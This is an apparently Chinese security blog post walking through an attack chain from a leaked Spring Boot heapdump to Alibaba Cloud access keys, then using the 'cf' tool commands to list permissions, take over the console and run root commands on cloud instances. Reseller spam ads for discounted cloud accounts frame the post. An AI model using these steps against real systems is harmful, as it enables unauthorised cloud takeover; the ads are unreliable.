记一次heapdump泄露到拿下云主机

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

一、信息泄露

通过前期信息收集发现某站存在springboot env 泄露。
在这里插入图片描述

二、发现accessKey

通过对其进行web扫描发现heapdump文件进行下载下载完成后使用解密工具对heapdump文件进行解密。
工具下载链接https://github.com/wyzxxz/heapdump_tool
在这里插入图片描述

三、对accessKey进行利用拿下存储桶以及云主机

发现accessKey后使用cf工具进行利用拿下oss存储桶以及云主机。
工具下载链接https://github.com/teamssix/cf
详细使用手册https://wiki.teamssix.com/cf/

cf config

配置accessKeyIdy以及accessKeySecret
这里需要先指定云服务厂商
![[Pasted image 20221208145400.png]]

cf.exe alibaba perm

一键列出当前访问凭证的权限
在这里插入图片描述

cf alibaba console

一键接管控制台
在这里插入图片描述

cf alibaba esc exec -b

CF 为实例执行命令的操作拿下root权限
在这里插入图片描述

在这里插入图片描述

连接控制台
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6
返回列表

上一篇:*(长期更新)软考网络工程师学习笔记——Section 21 防火墙技术原理

下一篇:ARP欺骗和DNS劫持以及Wireshark分析

“记一次heapdump泄露到拿下云主机” 的相关文章

Linux产生死锁的必要条件和常见的锁种类1年前 (2023-02-02)
AutoLisp演练(二)1年前 (2023-02-02)
混沌演练实践(一)1年前 (2023-02-02)
STM32F103和AIR32F103的FreeRTOS中断优先级1年前 (2023-02-02)
实现有序表的增删改查1年前 (2023-02-02)
Flutter框架渲染流程与使用1年前 (2023-02-02)
都用过@Autowired,但你知道它是怎么实现的吗1年前 (2023-02-02)
【 uniapp - 黑马优购 | 商品详情 】详情页UI结构设计、商品导航区域实现1年前 (2023-02-02)
CV:计算机视觉技最强学习路线之CV简介(传统视觉技术/相关概念)、早期/中期/近期应用领域(偏具体应用)、经典CNN架构(偏具体算法)概述、常用工具/库/框架/产品、环境安装、常用数据集、编程技巧1年前 (2023-02-02)
使用prometheus来避免Kubernetes CPU Limits造成的事故1年前 (2023-02-02)

阿里云国际版